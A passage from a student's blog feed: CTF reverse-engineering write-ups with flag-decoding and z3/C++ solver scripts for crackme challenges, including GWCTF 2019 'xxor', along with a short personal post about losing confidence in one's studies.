class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x4C</span>,<span class="number">0x0F</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span class="number">0x59</span>,<span class="number">0x43</span>,<span class="number">0x3</span>,<span class="number">0x4D</span>,<span class="number">0x3</span>,<span class="number">0x4C</span>,<span class="number">0x43</span>,<span class="number">0x0E</span>,<span class="number">0x59</span>,<span class="number">0x50</span>,<span class="number">0x1E</span>,<span 
class="number">0x1E</span>,<span class="number">0x4A</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> tmp = key[i]^<span class="number">0x66</span></span><br><span class="line"> tmp -= <span class="number">4</span></span><br><span class="line"> print(<span class="built_in">chr</span>(tmp^<span class="number">0x55</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># miniLctf{Re_1s_s0_1nt4r4st1ng!!}</span></span><br></pre></td></tr></table></figure><hr><h3 id="RE3-Ooooops-Worked-BB"><a href="#RE3-Ooooops-Worked-BB" class="headerlink" title="RE3-Ooooops | Worked: BB"></a><code>RE3-Ooooops </code>| Worked: BB</h3><p>Not much to say about this one; straight to the <code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">brute</span>(<span class="params">x</span>):</span></span><br><span class="line"> print(<span class="string">"[@_@] "</span>, x, <span class="string">": "</span>)</span><br><span class="line"> flag = [<span 
class="string">"m"</span>, <span class="string">"i"</span>, <span class="string">"n"</span>, <span class="string">"i"</span>, <span class="string">"l"</span>, <span class="string">"c"</span>, <span class="string">"t"</span>, <span class="string">"f"</span>, <span class="string">"{"</span>]</span><br><span class="line"> v4 = <span class="string">"!V -}VG-bp}m-nG!b|ra GyGE|Drp D"</span></span><br><span class="line"> v3 = [<span class="number">16</span>, <span class="number">4</span>, <span class="number">24</span>, <span class="number">11</span>, <span class="number">24</span>, <span class="number">16</span>, <span class="number">4</span>, <span class="number">21</span>, <span class="number">11</span>, <span class="number">5</span>, <span class="number">31</span>, <span class="number">46</span>, <span class="number">33</span>, <span class="number">46</span>, <span class="number">72</span>, <span class="number">21</span>, <span class="number">6</span>, <span class="number">46</span>, <span class="number">17</span>, <span class="number">59</span>, <span class="number">5</span>, </span><br><span class="line"> <span class="number">62</span>, <span class="number">46</span>, <span class="number">24</span>, <span class="number">21</span>, <span class="number">72</span>, <span class="number">46</span>, <span class="number">59</span>, <span class="number">33</span>, <span class="number">31</span>, <span class="number">10</span>]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">200</span>):</span><br><span class="line"> flag.append(<span class="string">""</span>)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag[<span class="number">9</span> + <span 
class="number">2</span> * i] = <span class="built_in">chr</span>((((v3[i]) ^ <span class="number">0x42</span>) - <span class="number">4</span>) ^ <span class="number">0x37</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1f</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag[<span class="number">9</span> + <span class="number">2</span> * i + <span class="number">1</span>] = <span class="built_in">chr</span>(((<span class="built_in">ord</span>(v4[i]) ^ <span class="number">0x13</span> ^ x) + <span class="number">4</span>) ^ <span class="number">0x4D</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> f = <span class="string">""</span>.join(flag)</span><br><span class="line"> print(<span class="string">"[?_?] "</span>, f)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">255</span>):<span class="comment"># brute force</span></span><br><span class="line"> brute(i)</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF competition writeups </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
</tags>
</entry>
<entry>
<title>Notes from a moment of mental meltdown</title>
<link href="2021/03/06/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%BF%83%E6%80%81%E7%88%86%E7%82%B8%E6%97%B6%E7%9A%84%E5%BF%83%E8%B7%AF/"/>
<url>2021/03/06/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%BF%83%E6%80%81%E7%88%86%E7%82%B8%E6%97%B6%E7%9A%84%E5%BF%83%E8%B7%AF/</url>
<content type="html"><![CDATA[<p>Today my mindset completely fell apart, and the root cause comes down to one thing: I'm too weak.</p><p>I've always been weak, but lately I feel especially weak. It's usually at times like this that I can see myself clearly, so I write something down to make myself hurt a little.</p><p>Last year I got into Xidian, which seemed pretty good. Relying on the tiny bit of computer knowledge I picked up in high school while slacking off, I felt far ahead of everyone else and thought I was amazing. In fact, I'm nothing. The truly strong people around me have already secured guaranteed graduate admission as freshmen... but I was still drunk on the illusion of being amazing, unwilling to face the fact that I'm very weak.</p><p>At Xidian I've been busy with all sorts of things, following the masters and seniors, getting smug at the slightest achievement, always fooling myself with trivial past results. Little did I know: those who were stronger than me before are still stronger; those who were weaker than me before are now stronger too...</p><p>And when reality woke me up, which is to say recently, my mindset naturally fell apart. I can't blame anyone but myself.</p><p>Sometimes I really look down on myself. I look down on that version of me with no prospects, no ability, no skill, who still calls himself amazing; worst of all, he refuses to see himself clearly, refuses to admit how weak he really is. He has to be a fool and wait until reality hits him hard before he sees the truth...</p><p>I've rambled on and said a lot of angry things, but they are also true. I hope I don't forget how bad this feels once the pain fades. All right, that's it; stop overthinking and get back to studying. Keep going!</p><p>Finally, remember:</p><ul><li>You're weak, you don't know anything, stop strutting around all day</li><li>When someone is stronger than you, he's your dad; when you think you're stronger than him, that's you getting inflated again</li><li>Lower your head and admit you can't do it; it's no big deal, just learn it</li></ul>]]></content>
<categories>
<category> Miscellany </category>
</categories>
<tags>
<tag> Miscellany </tag>
</tags>
</entry>
<entry>
<title>Thoughts on an RX problem</title>
<link href="2021/02/23/IDA%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/"/>
<url>2021/02/23/IDA%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/</url>
<content type="html"><![CDATA[<p>Honestly, this hardly counts as a reflection; it's more that, while studying one problem carefully, I finally sorted out a few odd things, so I'm writing them up. Nothing more to say: <code>RX,yyds</code></p><p>The problem is the third one from week 1 of the RX-guided RE study: <code>GWCTF 2019 xxor</code></p><h2 id="前置知识:"><a href="#前置知识:" class="headerlink" title="前置知识:"></a>Prerequisites:</h2><ul><li><code>C</code> data type sizes and ranges</li></ul><table><thead><tr><th>Type name</th><th>arch</th><th>Bytes</th><th>Bits</th></tr></thead><tbody><tr><td><code>char</code></td><td>*</td><td>1</td><td>8</td></tr><tr><td><code>short int</code></td><td>*</td><td>2</td><td>16</td></tr><tr><td><code>int</code></td><td>*</td><td>4</td><td>32</td></tr><tr><td><code>long</code></td><td><code>win</code></td><td>4</td><td>32</td></tr><tr><td></td><td><code>linux32</code></td><td>4</td><td>32</td></tr><tr><td></td><td><code>linux64</code></td><td>8</td><td>64</td></tr><tr><td><code>long long</code></td><td><code>*</code></td><td>8</td><td>64</td></tr></tbody></table><ul><li><p>Some data types that appear in <code>IDA</code>:</p><p>Let's write a program and look at it in <code>IDA</code>. This is the first version:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"> <span class="keyword">int</span> a;</span><br><span class="line"> <span class="keyword">long</span> b;</span><br><span class="line"> <span class="keyword">long</span> <span class="keyword">long</span> c;</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%d\n%ld\n%lld"</span>,<span 
class="keyword">sizeof</span>(a),<span class="keyword">sizeof</span>(b),<span class="keyword">sizeof</span>(c));</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>But <code>IDA</code>'s decompilation just gave me <code>printf(4)</code>... and didn't show the three variables I declared on the stack at all, which instantly annoyed me.</p><p>So here is the second version:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"> <span class="keyword">int</span> a;</span><br><span class="line"> <span class="keyword">long</span> b;</span><br><span class="line"> <span class="keyword">long</span> <span class="keyword">long</span> c;</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%d"</span>,&a);</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%ld"</span>,&b);</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%lld"</span>,&c);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%lld\n"</span>,a+b+c);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"int %d\n"</span>,<span 
class="keyword">sizeof</span>(a));</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"long %d\n"</span>,<span class="keyword">sizeof</span>(b));</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"long long %d\n"</span>,<span class="keyword">sizeof</span>(c));</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Let's look at the stack contents:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231125420850.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231125420850.png" srcset="" alt="image-20201231125420850"></p></li></ul><p>We can see <code>dd</code> and <code>dq</code> there; these denote the data size. Similar markers are <code>db</code> and <code>dw</code>.</p><table><thead><tr><th>Marker</th><th>Full name</th><th>Size/bytes</th></tr></thead><tbody><tr><td><code>db</code></td><td><code>define byte</code></td><td>1</td></tr><tr><td><code>dw</code></td><td><code>define word</code></td><td>2</td></tr><tr><td><code>dd</code></td><td><code>define double word</code></td><td>4</td></tr><tr><td><code>dq</code></td><td><code>define quad word</code></td><td>8</td></tr></tbody></table><p>The <code>word</code> here is not the same as a computer's word length. The word length we usually talk about refers to the bus width, so different <code>arch</code>s have different word lengths. <code>word</code> as a unit, however, comes from 16-bit machines, so when <code>word</code> is used as a size unit it is fixed at 2 <code>bytes</code>.</p><table><thead><tr><th><code>Architecture</code></th><th>Bus width</th><th>Word length</th></tr></thead><tbody><tr><td>8086</td><td>16-bit</td><td>2</td></tr><tr><td>x86</td><td>32-bit</td><td>4</td></tr><tr><td>x64</td><td>64-bit</td><td>8</td></tr></tbody></table><p>Now we can look at the problem itself.</p><h2 id="题目复现"><a href="#题目复现" class="headerlink" title="题目复现"></a>Problem walkthrough</h2><h3 id="总述WP"><a href="#总述WP" class="headerlink" 
title="总述WP"></a>Overview WP</h3><p>Check it with <code>DIE</code>: nothing special... Drag it into <code>IDA64</code>, and <code>woc</code>, a surprise! The symbol table wasn't stripped!!!</p><p>Find the <code>main</code> function and tidy it up:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span 
class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int64 v6[<span class="number">6</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line"> __int64 v7[<span class="number">6</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line"> v7[<span class="number">5</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> v6[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)((<span class="keyword">char</span> *)v6 + <span class="number">4</span> * 
i);</span><br><span class="line"> __isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line"> }</span><br><span class="line"> v7[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> dword_601078 = v6[j];</span><br><span class="line"> dword_60107C = HIDWORD(v6[j]);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line"> change(&dword_601078, &unk_601060);</span><br><span class="line"> LODWORD(v7[j]) = dword_601078;</span><br><span class="line"> HIDWORD(v7[j]) = dword_60107C;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check(v7, a2) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to 
change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The flow is fairly clear: after the input is read, the <code>change</code> function processes it, the <code>check</code> function compares it, and the result is printed.</p><p>Let's look at the <code>check</code> function first, after tidying up the decompilation:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> __int64 __fastcall <span class="title">check</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">signed</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( a1[<span class="number">2</span>] - a1[<span class="number">3</span>] != <span class="number">0x84A236FF</span>LL || a1[<span class="number">3</span>] + a1[<span class="number">4</span>] != <span class="number">0xFA6CB703</span>LL || a1[<span class="number">2</span>] - a1[<span class="number">4</span>] != <span class="number">0x42D731A8</span>LL 
)</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ( *a1 != <span class="number">0xDF48EF7E</span> || a1[<span class="number">5</span>] != <span class="number">0x84F30420</span> || a1[<span class="number">1</span>] != <span class="number">0x20CAACF4</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"good!"</span>);</span><br><span class="line"> result = <span class="number">1LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Following the hint, solve the equations with <code>z3</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">s=Solver()</span><br><span class="line">x0 = Int(<span class="string">'x0'</span>)</span><br><span class="line">x1 = Int(<span class="string">'x1'</span>)</span><br><span class="line">x2 = Int(<span class="string">'x2'</span>)</span><br><span class="line">x3 = Int(<span class="string">'x3'</span>)</span><br><span class="line">x4 = Int(<span class="string">'x4'</span>)</span><br><span class="line">x5 = Int(<span class="string">'x5'</span>)</span><br><span class="line">s.add(x0==<span class="number">0xDF48EF7E</span>)</span><br><span class="line">s.add(x5==<span class="number">0x84F30420</span>)</span><br><span class="line">s.add(x1==<span class="number">0x20CAACF4</span>)</span><br><span class="line">s.add(x2-x3==<span class="number">0x84A236FF</span>)</span><br><span class="line">s.add(x3+x4==<span class="number">0xFA6CB703</span>)</span><br><span class="line">s.add(x2-x4==<span class="number">0x42D731A8</span>)</span><br><span class="line"><span class="keyword">if</span> s.check() == sat:</span><br><span class="line">    m = s.model()</span><br><span class="line">    print(m)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">[x2 = 3774025685,</span></span><br><span class="line"><span class="string"> x3 = 1548802262,</span></span><br><span class="line"><span class="string"> x4 = 2652626477,</span></span><br><span class="line"><span class="string"> x1 = 550153460,</span></span><br><span class="line"><span class="string"> x5 = 2230518816,</span></span><br><span class="line"><span class="string"> x0 = 3746099070]</span></span><br><span class="line"><span class="string"> 
'''</span></span><br></pre></td></tr></table></figure><p>That effectively gives us <code>flag_enc</code>; now look at the <code>change</code> function:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">change</span><span class="params">(<span class="keyword">unsigned</span> <span class="keyword">int</span> *ini, _DWORD *tables)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 result; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var_1; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line"> <span class="keyword">int</span> tmp; <span class="comment">// [rsp+24h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line"> var = *ini;</span><br><span class="line"> var_1 = ini[<span 
class="number">1</span>];</span><br><span class="line"> tmp = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">63</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> tmp += <span class="number">0x458BCD42</span>;</span><br><span class="line"> var += (var_1 + tmp + <span class="number">11</span>) ^ ((var_1 << <span class="number">6</span>) + *tables) ^ ((var_1 >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line"> var_1 += (var + tmp + <span class="number">20</span>) ^ ((var << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line"> }</span><br><span class="line"> *ini = var;</span><br><span class="line"> result = var_1;</span><br><span class="line"> ini[<span class="number">1</span>] = var_1;</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Analyzing the three key lines of <code>change</code>: the update of <code>var_1</code> depends only on the current value of <code>var</code>, everything else being constant, and the update of <code>var</code> depends only on the current value of <code>var_1</code>, everything else being constant. So simply turning the plus signs into minus signs (and undoing the two updates in reverse order, as the exploit below does) is <code>ok</code>.</p><p>One more thing to watch: whatever data type a variable has in <code>IDA</code> (hover the mouse over a variable and it shows its type) is the data type you should use when writing the <code>exp</code>, otherwise things can go wrong.</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> flag_enc[<span class="number">6</span>],flag[<span class="number">6</span>]; <span class="comment">// six 32-bit words each: indices 0..5 are used below</span></span><br><span class="line">flag_enc[<span class="number">0</span>]=<span class="number">3746099070</span>;flag_enc[<span class="number">1</span>]=<span class="number">550153460</span>;flag_enc[<span class="number">2</span>]=<span class="number">3774025685</span>;flag_enc[<span class="number">3</span>]=<span class="number">1548802262</span>;flag_enc[<span class="number">4</span>]=<span class="number">2652626477</span>;flag_enc[<span class="number">5</span>]=<span class="number">2230518816</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> var[<span class="number">3</span>];</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> tables[<span class="number">4</span>]={<span 
class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">5</span>;i+=<span class="number">2</span>){</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> tmp = <span class="number">0x458BCD42u</span>*<span class="number">64</span>; <span class="comment">// tmp after the 64th round; unsigned so the wrap-around is well defined</span></span><br><span class="line">var[<span class="number">0</span>]=flag_enc[i];</span><br><span class="line">var[<span class="number">1</span>]=flag_enc[i+<span class="number">1</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<=<span class="number">0x3F</span>;j++){</span><br><span class="line">var[<span class="number">1</span>] -= (var[<span class="number">0</span>] + tmp + <span class="number">20</span>) ^ ((var[<span class="number">0</span>] << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var[<span class="number">0</span>] >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line">var[<span class="number">0</span>] -= (var[<span class="number">1</span>] + tmp + <span class="number">11</span>) ^ ((var[<span class="number">1</span>] << <span class="number">6</span>) + tables[<span class="number">0</span>]) ^ ((var[<span class="number">1</span>] >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line">tmp-=<span class="number">0x458BCD42</span>;</span><br><span class="line">}</span><br><span class="line">flag[i]=var[<span class="number">0</span>];</span><br><span class="line">flag[i+<span class="number">1</span>]=var[<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span>(<span 
class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">6</span>;i++)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>,flag[i]);</span><br><span class="line">}</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">0x666c61</span></span><br><span class="line"><span class="comment">0x677b72</span></span><br><span class="line"><span class="comment">0x655f69</span></span><br><span class="line"><span class="comment">0x735f67</span></span><br><span class="line"><span class="comment">0x726561</span></span><br><span class="line"><span class="comment">0x74217d</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>Then tidy the output up in <code>sublime</code> and run it through a quick <code>python</code> snippet:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">flag=[<span class="number">0x66</span>,<span class="number">0x6c</span>,<span class="number">0x61</span>,<span class="number">0x67</span>,<span class="number">0x7b</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x5f</span>,<span class="number">0x69</span>,<span class="number">0x73</span>,<span class="number">0x5f</span>,<span class="number">0x67</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x61</span>,<span class="number">0x74</span>,<span class="number">0x21</span>,<span class="number">0x7d</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">    print(<span 